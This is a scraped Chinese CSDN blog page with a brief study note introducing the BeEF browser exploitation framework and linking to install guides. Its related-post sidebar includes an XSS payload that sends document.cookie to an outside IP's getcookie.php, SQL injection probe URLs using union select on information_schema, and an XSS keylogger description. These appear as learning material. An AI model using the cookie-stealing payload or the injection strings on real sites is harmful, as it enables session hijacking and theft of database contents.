xss学习总结(二)

最新推荐文章于 2023-06-06 20:22:26 发布
最新推荐文章于 2023-06-06 20:22:26 发布
阅读量183 收藏
点赞数
分类专栏: web渗透 文章标签: xss 网络攻防
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Destiny_one/article/details/100565705
版权

Browser Exploitation Framework (BeEF)

BeEF是目前最强大的浏览器开源渗透测试框架,通过xss漏洞配合JS脚本和Metasploit进行渗透;

BeEF是基于Ruby语言编写的,并且支持图形化界面,操作简单;

具体的操作过程我也是看完别人的博客以后才完全明了;
https://blog.csdn.net/Laon_Chan/article/details/78595682

具体的安装过程可以看博客:https://www.cnblogs.com/xuanhun/p/4203143.html

我虚拟机得linux没有安装beEF,在安装的过程中也出现了一些问题,最后吐槽一句,在linux中安装程序是真的麻烦,也可能是因为我是新手的缘故吧…

鸣蜩十四
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【实验报告】实验三 XSS和SQL注入
m0_52108440的博客
12-13 1732
实验目的:了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。 系统环境:Kali Linux 2、Windows Server 网络环境:交换网络结构 实验工具: Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA 实验步骤: XSS部分:利用Beef劫持被攻击者客户端浏览器。 实验环境搭建。.
XSS学习总结
ad12456的博客
03-28 1484
xss学习
xss学习记录一
wh11te的博客
04-10 340
0x00 xss常用到的编码: 1. html 实体编码(10进制和十六进制): 例如[<]编码为:html 十进制:&#60; html 十六进制:&#x3c; 2. javascript 八进制和十六进制: 例如 [<]编码为: javascript 八进制:\74 javascript 十六进制:\x3c 3.url编码和base64编码: ...
XSS学习笔记
weixin_44377940的博客
03-09 158
XSS(跨站脚本攻击)分为反射型(不持久)、存储型(存储在服务器中,持久)、DOM型。
XSS学习总结21篇
qq_45300786的博客
06-18 635
所有的文章都是看源码分析的,但是我这里推荐用抓包工具看输出 这里我要补充一下xss的相关知识(这里非常非常重要,如果连这些都不知道,是很难做xss的) 一、html标签里可以继续写html标签 <p>giegie,我你男朋友不会揍我吧<script>alert(1)</script></p> 、html元素的属性可以触发事件(https://www.runoob.com/html/html-attributes.html) HTML 属性 HTML 元素可
预防XSS,这几招管用!
日拱一兵
06-28 474
最近重温了一下「黑客帝国」系列电影,一攻一防甚是精彩,生活中我们可能很少有机会触及那么深入的网络安全问题,但工作中请别忽略你身边的精彩大家应该都听过 XSS (Cross...
黑客学习-xss漏洞总结
weixin_49349476的博客
06-06 1092
XSS攻击全称跨站脚本攻击,是一种在Web应用中常见的安全漏洞,它允许用户将恶意代码植入到Web页面中,当其他用户访问此页面时,植入的恶意脚本就会在其他用户的客户端中执行。是为了不和层叠样式表的缩写混淆,故将跨站脚本攻击缩写为XSS。导致xss漏洞存在有几个原因对用户提交的数据未进行充分验证和过滤,如未对特殊字符和标签进行转义,导致恶意脚本被注入到Web页面中。
xss-vuln学习通关总结
最新发布
08-24
XSS漏洞详解】 XSS(Cross-site scripting)是一种常见的网络安全漏洞,主要表现为黑客通过注入恶意脚本到网页中,从而在用户浏览网页时控制用户的浏览器。这种攻击最初因为涉及跨域而得名,但随着JavaScript的...
XSS跨站学习总结
05-23
XSS跨站总结,讲的相对比较全。主要有XSS的简介、形成原因、种类、常用攻击手段与目的外加如何挖掘跨站
xss平台源码
09-28
总结来说,"xss平台源码"是一个宝贵的教育资源和研究工具,它可以帮助我们理解和防御XSS攻击,提升Web安全水平。无论是对安全从业人员还是开发者来说,深入学习和研究这一平台,都将对职业生涯产生积极的影响。
xss-platform.rar
05-27
总结来说,ThinkPHP的xss-platform是Web开发中防范XSS攻击的重要工具,它集检测、防御、学习和演练于一体,为PHP开发者提供了全面的XSS防护解决方案。通过深入研究和使用该平台,开发者不仅可以提升自身的安全技能,...
xss的cookie窃取原理
鸣蜩十四的博客
08-09 1378
原理:我们可以在有xss漏洞的网站插入跳入我们网站的xss代码,使用户触发漏洞的时候将cookie传入进来,我们进行接收 具体实现: 攻击代码:<script>document.write('<img src="http://1.117.107.31/getcookie.php?cookie='+document.cookie+'" width=0 height=0 border=0 />');</script> 远程接收代码: <?php $c...
sql注入-整型与字符型
鸣蜩十四的博客
11-19 1357
1、数字型注入 当输入的参数为整形时,如果存在注入漏洞,可以认为是数字型注入。 测试步骤: (1) 加单引号,www.aaa.com/a.php?id=1’ 对应的sql:select * from table where id=1’ 这时sql语句出错,程序无法正常从数据库中查询出数据,就会抛出异常; (2)1=1返回正确 加and 1=1 ,www.aaa.com/a.php?id=1’and...
SQL注入(思维导图)
鸣蜩十四的博客
05-27 748
sql-lib 1-10关
鸣蜩十四的博客
06-14 650
1. 字符型 http://127.0.0.1:88/sql/Less-1/?id=1' order by 4%23失败 http://127.0.0.1:88/sql/Less-1/?id=1' order by 3%23成功 http://127.0.0.1:88/sql/Less-1/?id=-1' union select 1,database(),group_concat(schema_name) from information_schema.schemata%23 查看所有数据库 ht...
XSS获取键盘原理
鸣蜩十四的博客
08-09 636
涉及的js知识: onkeypress 事件会在键盘按键被按下并释放一个键时发生 fromCharCode() 可接受一个指定的 Unicode 值,然后返回一个字符串。 charCode 事件属性 事件对象 实例 获取按下的键盘按键Unicode值 XMLHttpRequest 对象能够: 在不重新加载页面的情况下更新网页 在页面已加载后从服务器请求数据 在页面已加载后从服务器接收数据 在后台向服务器发送数据 encodeURI(key)对URI 进行完整的编码 http.open第三个参数设置请求是否为
sql注入--报错注入
鸣蜩十四的博客
08-05 628
利用数据库的bug进行利用,看报错信息,报错的信息会出现我们想要的信息 讲解报错注入原理非常详细的一篇博客https://blog.csdn.net/he_and/article/details/80455884 concat()这个函数用来将两个字符串连接为一个字符串 floor函数的作用是返回小于等于该值的最大整数,也可以理解为向下取整,只保留整数部分。 .rand()函数可以用来生成0或1,但是rand(0)和rand()还是有本质区别的,rand(0)相当于给rand()函数传递了一个参数,然后r
整形与字符型sql注入
鸣蜩十四的博客
08-05 576
1、数字型注入 当输入的参数为整形时,如果存在注入漏洞,可以认为是数字型注入。 测试步骤: (1) 加单引号,URL:www.text.com/text.php?id=3’ 对应的sql:select * from table where id=3’ 这时sql语句出错,程序无法正常从数据库中查询出数据,就会抛出异常; (2) 加and 1=1 ,URL:www.text.com/text.php...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值